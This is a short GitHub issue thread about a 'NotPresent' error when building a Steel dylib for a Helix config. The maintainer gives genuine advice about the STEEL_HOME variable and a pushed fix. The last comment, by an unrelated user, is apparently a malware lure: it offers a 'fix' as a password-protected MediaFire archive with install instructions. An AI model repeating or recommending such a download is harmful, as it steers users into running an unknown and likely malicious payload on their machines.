### ISSUE TITLE
exe steel dylib fail

### ISSUE THREAD

**Issue by ofzo** [mattwparas/helix-config#7]
Error: NotPresent
<img width="248" alt="image" src="https://github.com/user-attachments/assets/6deaee80-3012-4de3-9832-21014a3e1354">

installed steel from https://github.com/mattwparas/steel, build from source

**Comment by mattwparas** [comment]
Have you set the `STEEL_HOME` env var? I think that will fix it. I have to update it to use the inferred location like the rest of steel

**Comment by mattwparas** [comment]
Just pushed the change for cargo steel lib to do that - so if you pull the latest and reinstall it should work as expected

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
